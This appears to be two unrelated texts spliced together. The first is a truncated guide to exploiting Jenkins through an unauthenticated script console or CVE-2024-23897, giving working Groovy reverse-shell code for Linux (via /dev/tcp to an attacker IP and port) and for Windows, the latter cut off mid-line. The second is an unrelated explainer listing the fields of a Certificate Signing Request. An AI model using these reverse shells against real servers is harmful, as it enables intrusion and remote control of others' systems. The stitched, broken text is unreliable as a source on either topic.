Exploiting Jenkins / CVE-2024-23897 Often the script console is accessible without authentication due to misconfig on http://JENKINS_IP/script If you don't have access to script console and the version is vulnerable to CVE-2024-23897 , then exploit it to read files and get authentication credentials for Jenkins, (explained below) Groovy scripts can be executed from the script console. To get a reverse shell, execute the following script. For Linux, r = Runtime.getRuntime() p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/YOUR_IP/PORT;cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[]) p.waitFor() For Windows, String host="YOUR_IP"; int port=PORT; String cmd="cmd.exe"; Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();Socket s=new Socket(host,port);InputStream pi=p.getInputStream(),pe=p.getErrorStream(), si=s.getInputStream();OutputStream po=p.getOutputStrea...
A CSR or Certificate Signing request is a block of encoded text that is submitted to a Certificate Authority (CA) for a Signed Digital Certificate. The certificate authority will use a CSR to sign and create the Digital certificate. The CSR doesn't contain the Private Key. Remember that the Private Key is always secret and remains private to you. The certificate created with a particular CSR will only work with the private key that was generated with it. So if you lose the private key, the certificate will no longer work.
More Read :
So what are the information contains in a CSR?
- Common Name : The Fully Qualified Domain Name (FQDN) of the Server.
- Organization : Name of your company or organization.
- Organizational Unit : Department name
- City/Locality : City information
- State/County/Region : State or Region Information
- Country : Country information in ISO naming format. (For example USA is US, United Kingdom is UK, India is IN)
- Email address : Email contact information of the organization.
- Public Key : The public key of the server.